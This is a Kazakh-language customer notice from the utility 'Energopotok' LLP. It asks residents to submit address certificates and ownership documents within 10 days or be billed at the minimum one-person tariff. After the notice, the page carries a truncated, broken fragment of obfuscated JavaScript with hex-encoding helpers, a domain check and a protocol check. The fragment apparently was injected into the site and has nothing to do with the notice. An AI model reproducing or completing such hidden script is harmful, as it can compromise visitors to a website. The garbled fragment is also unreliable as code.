Тұтынушылар үшін керек дерек! PDF Басып шығару

Құрметті тұтынушы!

«Энергопоток» ЖШС өкілдері сіздерге төмендегідей мәтіндегі хабарлама таратуда. Бұл анықтамада аты-жөніңіз толық нұсқада көрсетілуін ескеруді сұранамыз.

Энергиямен жабдықтаушы ұйымдармен тәулік зоналары бойынша қағидасының 10-1 тарауына сәйкес, тұтыну көлеміне қарай сараланған тарифтер бойынша тұтынылған электр энергиясы үшін ақы төлеу тұрғылықты жеке тұлғалардың санын ескере отырып белгіленеді, оған ХҚК орталығынан тұрғылықты жерін растайтын мекен-жай анықтамалары негіз болып табылады.

«Энергопоток» ЖШС-де Сіздің үй құрылысы немесе пәтер бойынша тұлға санын дәлелдейтін құжаттар туралы мәлімет жоқ, сондықтан Сізге ескерту алған күннен бастап 10 күн ішінде «Энергопоток» ЖШС-нің Call center орталығына (Тоқаева 27 үй 2-ші қабат) келесі құжаттарды ұсынуыңыз қажет: ХҚК орталығынан мекен-жай анықтамасы әрбір отбасы мүшесіне, тіркелген құқықтары туралы анықтама немесе меншік иесі туралы мәлімет, меншік иесінің жеке куәлігі.( ХҚК орталығынан жақын туыстарыңызға мекен-жай анықтамасын алу үшін, келесі құжаттар: жеке куәлік, неке куәлігі, туу туралы куәлігі болуы қажет)

Сонымен қатар, электр энергиясын пайдалану қағидасының 9 тарауына сәйкес, егер обьектінің иесі өзгерген жағдайда, жаңа меншік иесі жеке меншік құқығын тіркеген сәттен бастап он жұмыс күнінің ішінде энергиямен жабдықтаушы ұйымды меншік иесінің ауысқаны туралы жазбаша түрде хабарлайды және энергиямен жабдықтаушы ұйымға энергиямен жабдықтау шартын жасасу үшін құжаттарды, яғни меншік иесінің жеке куәлігі мен меншік иесі туралы мәлімет ұсыну қажет.

Мерзімі өткеннен кейін, талап етілген құжаттар болмаған жағдайда электр энергия есебі төменгі тариф бойынша тек бір адамға ғана есептеледі және өтіп кеткен уақыт үшін қайта есептеу жүргізілмейді.

 

«Энергопоток» ЖШС әкімшілігі, байланыс тел. 400704

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kaz.energopotok.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Add comment


Security code
Refresh